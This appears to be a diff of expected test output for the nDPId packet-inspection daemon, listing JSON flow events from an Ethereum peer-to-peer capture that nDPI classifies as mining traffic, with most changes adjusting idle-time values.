+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 